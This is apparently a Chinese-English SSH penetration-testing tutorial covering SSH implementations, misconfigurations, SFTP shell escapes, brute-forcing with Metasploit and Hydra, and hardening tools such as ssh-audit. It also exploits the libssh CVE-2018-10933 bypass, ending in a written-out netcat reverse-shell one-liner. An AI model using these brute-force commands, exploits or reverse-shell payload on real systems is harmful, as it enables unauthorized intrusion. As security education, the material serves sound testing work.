渗透-1.SSH渗透
一、SSH和SFTP
SSH is a secure remote shell protocol used for operating network services securely over an unsecured network. The default SSH port is 22, it’s common to see it open on servers on Internet or Intranets.
SFTP is the SSH File Transfer Protocol, a protocol used to transfer files over an SSH connection. Most SSH implementations are also supporting SFTP.
二、SSH servers/libs
The most famous and common SSH server and client is openSSH (OpenBSD Secure Shell). It’s a strong implementation which is well maintained and was first released in 1999. So this is the implementation you will see the most often on BSD, Linux and even Windows as it is shipped in Windows since Windows 10.
But openSSH is not the only implementation, here are other ones:
SSH servers:
- openSSH - OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10
- Dropbear - SSH implementation for environments with low memory and processor resources, shipped in OpenWrt
- PuTTY - SSH implementation for Windows, the client is commonly used but the use of the server is rarer
- CopSSH - implementation of OpenSSH for Windows
SSH libraries (implementing server-side):
- libssh - multiplatform C library implementing the SSHv2 protocol with bindings in Python, Perl and R; it’s used by KDE for sftp and by GitHub for the git SSH infrastructure
- wolfSSH - SSHv2 server library written in ANSI C and targeted for embedded, RTOS, and resource-constrained environments
- Apache MINA SSHD - Apache SSHD java library is based on Apache MINA
- paramiko - Python SSHv2 protocol library
三、常见错误配置
1.允许root远程登陆
/etc/ssh/sshd_config
PermitRootLogin no
systemctl daemon-reload
systemctl restart sshd
2.SFTP用户可执行命令
很多人认为创建一个SFTP用户,并指定/usr/bin/nologin 和 /usr/bin/false,可以避免安全问题,但实际上用户可以完成用户认证后执行一个命令从而获得shell权限,如下操作:
$ ssh -v [email protected] id
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting [email protected]
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype [email protected] want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype [email protected] reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0
$ ssh [email protected] /bin/bash
针对SFTP用户安全配置 /etc/ssh/sshd_config (/etc/ssh/sshd_config – openSSH)
Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no
This configuration will allow only SFTP: disabling shell access by forcing the start command and disabling TTY access but also disabling all kind of port forwarding or tunneling.
3.认证方法
在高安全级别环境,通常启用基于密钥或着两种因素的身份验证,但启用更高级别验证后,并不禁用较弱身份验证,通过SSH客户端的详细模式,攻击者发现启动了一种较弱登陆方法。
$ ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
$ ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password
四、攻击示例
1.密码攻击
Password guessing/bruteforce attack
Metasploit
GitHub:https://github.com/rapid7/metasploit-framework
下载:https://rpm.metasploit.com/metasploit-omnibus/pkg/metasploit-framework-5.0.75%2B20200215112510~1rapid7-1.el6.x86_64.rpm
# curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
在线安装,需要科学上网,手动安装:
# rpm -ivh metasploit-framework-5.0.75+20200215112510~1rapid7-1.el6.x86_64.rpm
warning: metasploit-framework-5.0.75+20200215112510~1rapid7-1.el6.x86_64.rpm: Header V4 RSA/SHA256 Signature, key ID 2007b954: NOKEY
Preparing... ################################# [100%]
Updating / installing...
1:metasploit-framework-5.0.75+20200################################# [100%]
Run msfconsole to get started
[root@Ansible-203 tmp]# msfconsole
[-] ***rting the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v5.0.75-dev- ]
+ -- --=[ 1969 exploits - 1087 auxiliary - 338 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
$ msf5 > search ssh
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
18 auxiliary/scanner/ssh/ssh_login normal Yes SSH Login Check Scanner
msf5 > use 18
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/password/rockyou.txt
PASS_FILE => /usr/share/wordlists/password/rockyou.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.94
RHOSTS => 192.168.1.94
msf5 auxiliary(scanner/ssh/ssh_login) > set THREADS 10
THREADS => 10
msf5 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/ssh/ssh_login) > set username noraj
username => noraj
msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.1.94:22 - Success: 'noraj:noraj' ''
[*] Command shell session 1 opened (192.168.1.83:37291 -> 192.168.1.94:22) at 2020-01-02 21:33:33 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Hydra
Github:https://github.com/vanhauser-thc/thc-hydr
# yum install -y openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
# yum install -y gcc gcc-c++
# git clone https://github.com/vanhauser-thc/thc-hydra
# cd thc-hydra
# ./configure --prefix=/opt/hydra
# make
# make install
Now type make install
strip hydra pw-inspector
echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null
mkdir -p /opt/hydra/bin
cp -f hydra-wizard.sh hydra pw-inspector /opt/hydra/bin && cd /opt/hydra/bin && chmod 755 hydra-wizard.sh hydra pw-inspector
echo OK > /dev/null && test -x xhydra && cp xhydra /opt/hydra/bin && cd /opt/hydra/bin && chmod 755 xhydra || echo OK > /dev/null
sed -e "s|^INSTALLDIR=.*|INSTALLDIR="/opt/hydra"|" dpl4hydra.sh | sed -e "s|^LOCATION=.*|LOCATION="/etc"|" > /opt/hydra/bin/dpl4hydra.sh
chmod 755 /opt/hydra/bin/dpl4hydra.sh
mkdir -p /opt/hydra/etc
cp -f *.csv /opt/hydra/etc
mkdir -p /opt/hydra/man/man1/
cp -f hydra.1 xhydra.1 pw-inspector.1 /opt/hydra/man/man1/
# ln -s /opt/hydra/bin/hydra /usr/bin/
# hydra -l root -P /usr/share/wordlists/password/rockyou.txt -e s ssh://192.168.11.205
Hydra v9.1-dev (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-17 02:36:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking ssh://192.168.11.205:22/
[22][ssh] host: 192.168.11.205 login: root password:
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-17 02:37:00
Medusa
GitHub:https://github.com/jmk-foofus/medusa
Ncrack
WebSite:http://ncrack.org
2.漏洞利用
CVE-2018-10933
CVE-2018-10933 is the reference for a vulnerability impacting libssh library. This vulnerability allows unauthorized access by bypassing the authentication.
libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, the attacker could successfully authentciate without any credentials. Advisory
When you find a vulnerable version with nmap you should see something like that:
22/tcp open ssh libssh 0.8.3 (protocol 2.0)
searchsploit (the tool used to locally browse the Exploit-DB) shows the existing exploits available for libssh.
searchsploit libssh
-------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------- ----------------------------------------
LibSSH 0.7.6 / 0.8.4 - Unauthorized Access | exploits/linux/remote/46307.py
libSSH - Authentication Bypass | exploits/linux/remote/45638.py
-------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
So we can use the exploit to execute a command on the target in order to confirm it is working.
$ python /usr/share/exploitdb/exploits/linux/remote/46307.py 192.168.1.94 22 id
uid=0(root) gid=0(root) groups=0(root)
Instead of just running a command we can try to execute a reverse shell.
First we start the listener on our machine: sudo ncat -nlp 80.
Then we use a sh reverse shell payload in the exploit:
python /usr/share/exploitdb/exploits/linux/remote/46307.py 192.168.1.94 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.100 80 >/tmp/f"
五、其他工具和资源
“HASSH” is a network fingerprinting standard which can be used to identify specific Client and Server SSH implementations. The fingerprints can be easily stored, searched and shared in the form of an MD5 fingerprint.
HASSH is a standard that helps blue teams to detect, control and investigate brute force or credential stuffing password attempts, exfiltration of data, network discovery and lateral movement, etc.
**ssh-audit **is an SSH server auditing tool (banner, key exchange, encryption, mac, compression, compatibility, security, etc).
It’s handy for professional pentesters to quickly detect the target version and knowing which algorithms are available on the remote server to be able to give algorithm recommendations to the customer.
Example of use:
$ ssh-audit 192.168.1.94
# general
(gen) banner: SSH-2.0-OpenSSH_7.9
(gen) software: OpenSSH 7.9
(gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+
(gen) compression: enabled ([email protected])
# key exchange algorithms
(kex) curve25519-sha256 -- [warn] unknown algorithm
(kex) [email protected] -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
`- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
`- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
`- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
`- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
(kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
`- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
# host-key algorithms
(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
`- [warn] using weak random number generator could reveal the key
`- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
# encryption algorithms (ciphers)
(enc) [email protected] -- [info] available since OpenSSH 6.5
`- [info] default cipher since OpenSSH 6.9.
(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr -- [info] available since OpenSSH 3.7
(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) [email protected] -- [info] available since OpenSSH 6.2
(enc) [email protected] -- [info] available since OpenSSH 6.2
# message authentication code algorithms
(mac) [email protected] -- [warn] using small 64-bit tag size
`- [info] available since OpenSSH 6.2
(mac) [email protected] -- [info] available since OpenSSH 6.2
(mac) [email protected] -- [info] available since OpenSSH 6.2
(mac) [email protected] -- [info] available since OpenSSH 6.2
(mac) [email protected] -- [warn] using weak hashing algorithm
`- [info] available since OpenSSH 6.2
(mac) [email protected] -- [warn] using encrypt-and-MAC mode
`- [warn] using small 64-bit tag size
`- [info] available since OpenSSH 4.7
(mac) [email protected] -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
`- [warn] using weak hashing algorithm
`- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
# algorithm recommendations (for OpenSSH 7.9)
(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
(rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
(rec) -hmac-sha2-512 -- mac algorithm to remove
(rec) [email protected] -- mac algorithm to remove
(rec) -hmac-sha2-256 -- mac algorithm to remove
(rec) [email protected] -- mac algorithm to remove
(rec) -hmac-sha1 -- mac algorithm to remove
(rec) [email protected] -- mac algorithm to remove
(rec) [email protected] -- mac algorithm to remove
六、SSH其他著名漏洞
- https://www.exploit-db.com/exploits/18557 ~ Sysax 5.53 SSH ‘Username’ Remote Buffer Overflow
- https://www.exploit-db.com/exploits/45001 ~ OpenSSH < 6.6 SFTP Command Execution
- https://www.exploit-db.com/exploits/45233 ~ OpenSSH 2.3 < 7.7 Username Enumeration
- https://www.exploit-db.com/exploits/46516 ~ OpenSSH SCP Client Write Arbitrary Files
Leave a comment